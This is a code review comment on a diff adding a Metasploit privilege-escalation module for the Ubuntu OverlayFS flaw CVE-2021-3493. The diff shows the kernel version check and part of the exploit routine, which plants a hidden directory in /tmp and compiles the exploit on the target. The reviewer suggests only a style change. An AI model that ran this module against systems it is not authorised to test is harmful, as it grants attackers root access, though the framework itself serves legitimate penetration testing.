modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

```diff
@@ -0,0 +1,156 @@
+          [ 'URL', 'https://github.com/briskets/CVE-2021-3493' ]
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def check
+    arch = kernel_hardware
+
+    unless arch.include?('x86_64') || arch.include?('aarch64')
+      return CheckCode::Safe("System architecture #{arch} is not supported")
+    end
+
+    release = kernel_release
+    version = kernel_version
+
+    # If the target is Ubuntu...
+    unless version =~ /[uU]buntu/
+      return CheckCode::Safe('Target is not Ubuntu!')
+    end
+
+    version_array = release.split('-')
+    if version_array.length < 2
+      fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')
+    end
+    vprint_status("Version array: #{version_array}")
+    major_version = Rex::Version.new(version_array[0])
+    vprint_status("major_version: #{major_version}")
+    minor_version = version_array[1]
+    vprint_status("minor_version: #{minor_version}")
+    lower_bound_version = Rex::Version.new(3.13)
+    upper_bound_version = Rex::Version.new(5.14)
+    if major_version > upper_bound_version || major_version < lower_bound_version
+      return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}")
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    if is_root? && !datastore['ForceExploit']
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')
+    end
+    base_dir = datastore['WritableDir'].to_s
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    exploit_path = "#{exploit_dir}/#{executable_name}"
+    if file_exist?(exploit_dir)
+      fail_with(Failure::BadConfig, 'Exploit dir already exists')
+    end
+    mkdir(exploit_dir)
+    register_dir_for_cleanup(exploit_dir)
+
+    # Upload exploit
+    arch = kernel_hardware
+    vprint_status("Detected architecture: #{arch}")
+    if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))
+      fail_with(Failure::BadConfig, 'Host/payload Mismatch')
+    end
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c')
```

Comment:
https://github.com/rapid7/metasploit-framework/pull/13370#issuecomment-624202074

```suggestion
      vprint_status('Live compiling exploit on system...')
      upload_and_compile(exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c'))
```